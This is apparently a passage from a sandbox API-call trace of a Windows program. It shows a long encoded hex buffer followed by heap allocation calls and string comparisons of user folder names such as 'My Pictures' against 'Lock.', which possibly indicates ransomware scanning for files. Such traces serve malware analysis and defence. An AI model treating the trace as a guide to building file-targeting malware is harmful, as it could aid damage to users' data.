7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0264.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.525] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0264.526] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.526] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0264.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0264.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.527] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0264.527] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0264.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0264.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 